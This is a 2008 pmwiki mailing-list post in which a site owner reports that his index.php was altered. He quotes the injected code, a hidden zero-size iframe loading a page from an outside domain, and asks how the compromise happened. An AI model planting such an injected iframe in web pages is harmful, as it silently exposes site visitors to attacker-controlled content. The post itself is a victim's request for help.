[pmwiki-users] Possible security issue
Marcus
films at wordit.com
Wed Mar 5 06:32:18 CST 2008
I have a possible security issue, not sure whether it is pmwiki or on my
server.
I've been running pmwiki for about a week online. Yesterday the
index.php page gave a syntax error about a missing closing tag. I
wondered why the page had changed when I hadn't edited it.
It turns out somebody was able to use a security exploit to write to the
index.php file. They add the following iframe:
<?php include('pmwiki.php');
<iframe src="http://pinoc.com/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0
scrolling=no></iframe>
I've no idea what that domain pinoc.com is and what the intention is.
Normally I think they are spammers trying to add links. If so, where do
I report them?
The file was only writable by owner. Now I changed all permissions to
read-only. That solves it, but I'd still like to know how it could be
possible?
I'm running pmwiki-2.2.0-beta65. Any ideas whether this is a pmwiki
issue or my setup, or my general server security?
Before I forget, a big Thank You to Patrick and the other developers for
pmwiki. I'm running Puppy Linux, which follows a similar philosophy as
pmwiki, trying to avoid bloat yet remain powerful. pmwiki being under
2MB unpacked is brilliant. It just works out of the box. I can rsync
with local and online wikis because pmwiki uses flast files. With
lighty, and PHP it's all only 15MB. You really did make it simple and
extensible. Great job.
Many Thanks,
Marcus
More information about the pmwiki-users
mailing list